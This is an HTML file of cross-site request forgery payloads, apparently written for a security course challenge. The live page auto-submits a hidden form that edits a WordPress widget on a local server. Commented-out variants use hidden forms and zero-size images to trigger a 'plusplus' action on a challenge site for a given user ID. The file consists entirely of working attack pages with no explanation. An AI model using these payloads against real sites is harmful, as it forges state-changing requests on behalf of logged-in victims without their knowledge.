<!--
<HTML>
<HEAD>
<TITLE>PLS WORK!!!</TITLE>
</HEAD>
<P>Work pls</P>
<form name="csrf" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
    <input type="hidden" name="userId" value="d39e9aed2072b333290582069fe851cce5e6b3d1">
    <input type="submit">
</form>
Hello World
<script>document.csrf.submit();</script>
</BODY>
</HTML>
-->
<!--
<HTML>
<HEAD>
<TITLE>PLS WORK!!!</TITLE>
</HEAD>
<P>Work pls</P>
<img src="http://127.0.0.1:8080/wp-admin/widgets.php?widgets-access=on&editwidget=search-2&sidebar=sidebar-2&key=0" width="0" height="0" border="0">
Hello World
</BODY>
</HTML>
-->
<HTML>
<HEAD>
<TITLE>PLS WORK!!!</TITLE>
</HEAD>
<P>Work pls</P>
<form name="csrf" action="http://127.0.0.1:8080/wp-admin/widgets.php" method="POST">
    <input type="hidden" name="widget-search[2][title]" value="csrfinsearch">
    <input type="hidden" name="sidebar" value="sidebar-1">
    <input type="hidden" name="sidebar-1_position" value="1">
    <input type="hidden" name="savewidget" value="Save+Widget">
    <input type="hidden" name="widget-id" value="search-2">
    <input type="hidden" name="id_base" value="search">
    <input type="hidden" name="multi_number" value="2">
    <input type="hidden" name="_wponce" value="26199841e9">
    <input type="hidden" name="_wp_http_referer" value="/wp-admin/widgets.php?widgets-access=on&editwidget=search-2&sidebar=sidebar-1&key=0">
    <input type="submit">
</form>
Hello World
<script>document.csrf.submit();</script>
</BODY>
</HTML>
<!--
<HTML>
<HEAD>
<TITLE>PLS WORK!!!</TITLE>
</HEAD>
<P>Work pls</P>
<img src="https://security.codepath.com/user/csrfchallengetwo/plusplus?userId=d39e9aed2072b333290582069fe851cce5e6b3d1" width="0" height="0" border="0">
Hello World
</BODY>
</HTML>
-->
